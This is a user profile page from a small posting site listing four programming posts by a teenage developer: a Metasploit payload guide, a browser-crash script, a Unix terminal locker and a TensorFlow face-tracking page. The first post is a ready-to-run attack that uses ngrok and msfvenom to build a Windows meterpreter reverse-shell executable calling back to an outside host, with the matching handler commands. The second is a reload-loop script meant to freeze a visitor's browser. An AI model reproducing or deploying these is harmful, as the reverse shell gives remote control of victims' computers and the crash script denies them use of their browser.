@floppyfish118
74 Reputation

floppyfish118 (4 Posts)

4 Posts
0 Comments
Somewhere
Age: 15
Followers: 3
Offline

Software dev known Langs: C#,CPP,C, HTML,JS, and Python

9 likes

1.28k views

5 comments

0 dislikes

4 posts

Score:
74
Followers:
3

Metasploit payload without Port Forwarding #Programming #Article

Main shell script here for linux 

echo "Setting up ngrok";
./ngrok tcp 9999
echo "Done";
echo "Building shell";
msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19631 -f exe > payload.exe
echo "Done";
echo "Setting up listener"
echo "Done"
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 9999
exploit

 



Score:
74
Followers:
3

Web crash script #Programming #Article

A simple script that can crash a web browser of pc depending on the type it works on chomebook very fast idk about other windows PC or Mac. 

<script>
    onbeforeunload=function() {
      localstorage.x=1
    };
    setTimeout(function() {
      while (1) location.reload(1)
    }, 1000)  
  </script>

 



Score:
74
Followers:
3

terminal locker for Unix made in C #Programming #Article

This is script game fromt the book Unix System Security I took the scripts and edited it a little bit 

#include <stdio.h>
#include <signal.h>
 main ()
{
  char passbuf[10], *passwd, *getpass ();
  int sleepcount = 1;
  int validentry = 0;

  while ( ! validentry) {
    strcpy (passbuf, getpass ("Enter password: "));

    if ( strlen (passbuf) < 4)
      printf("Please enter at least four characters\n");
    else 
      validentry = 1;
    
  }
  signal(SIGINT, SIG_IGN);
  signal(SIGQUIT, SIG_IGN);
  printf("\n\n\n\n\n");
  printf("\t\t*************************************\n");
  printf("\t\t*                                   *\n");
  printf("\t\t*                                   *\n");
  printf("\t\t*          TERMINAL SECURED         *\n");
  printf("\t\t*                                   *\n");
  printf("\t\t*                                   *\n");
  printf("\t\t*                                   *\n");
  printf("\t\t*                                   *\n");
  printf("\t\t*************************************\n");
  printf("\n\n\n\n\n");

  validentry = 0;

  while ( ! validentry){
    passwd …
Read More

Score:
74
Followers:
3

Face tracking with Tensorflow #Education #Article

Requires HTML, javascript, and typescript if needed

Below is index.html

<!DOCTYPE html>
<script>
  function delay(milisecondDelay) {
   milisecondDelay += Date.now();
   while(Date.now() < milisecondDelay){}
}
delay(5000);

</script>
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script>

</script>
</head>
<body>
</body>
<div id="uniqid">
</div>
<html>
<head>
<script src="https://cdn.jsdelivr.net/npm/@tensorflow/tfjs"></script>
<script src="https://cdn.jsdelivr.net/npm/@tensorflow-models/blazeface"></script>
    <meta charset="utf-8">
    <link rel="stylesheet" href="main.css">
    <title>Tensor track</title>
    </head>
    <body>
    <div class ="background">
    <div class="blur">
    <h2 id="heading"></h3>
    <div id="videoContainer">
    <video id="webcam" width="1000" height="1000" autoplay style="display:none" ></video>    
    <canvas id="canvas" width="640" height="480"></canvas>
    </div>
        
    <script src ="index.js" type="text/javascript"></script>
    </div>
    </div>
    </body>
   
</html>
<script type="module">
const videoElement = document.getElementsByClassName('input_video')[0];
const canvasElement = document.getElementsByClassName('output_canvas')[0];
const canvasCtx = canvasElement.getContext('2d');

function onResults(results) {
  canvasCtx.save();
  canvasCtx.clearRect(0, …
Read More

Login For More Features

So you can create and connect with what matters to you.

or

Trending Posts

is it just me or does 2/3 of people use this plat… | March 28, 2024 | 150 views
why the **** is there posts about... special dolls | April 02, 2024 | 55 views
https://sentonoa.xyz/ It's out! I'm now self-hos… | March 25, 2024 | 99 views
Solar Eclipse Day! | April 08, 2024 | 58 views
bruh | April 06, 2024 | 78 views

Quick Settings


Top Users

Dheirya_Tyagi_CEO | 3706 Reputation
Trxp_Crzxp | 2454 Reputation
Bendy | 2090 Reputation
kz | 1951 Reputation
Eklavya_Tyagi | 1215 Reputation

Precipitation: %
Wind: mph
Weather data updates every 6 hours.

Categories

Not a category you like? Create one.

Sports | 18 followers | 6 posts

Talk about sports in this category!


Lifestyle | 18 followers | 13 posts

Talk about lifestyle in this category!


Political | 14 followers | 5 posts

Talk about political issues in this category!


Travel | 10 followers | 4 posts

Talk about travel in this category!


Fashion | 16 followers | 4 posts

Talk about fashion in this category!


Education | 15 followers | 23 posts

Talk about education in this category!


Music | 19 followers | 7 posts

Talk about music in this category!


News | 13 followers | 22 posts

Talk about news in this category!


Personal | 18 followers | 21 posts

Talk about personal topics in this category.


Not displaying all categories. See all categories.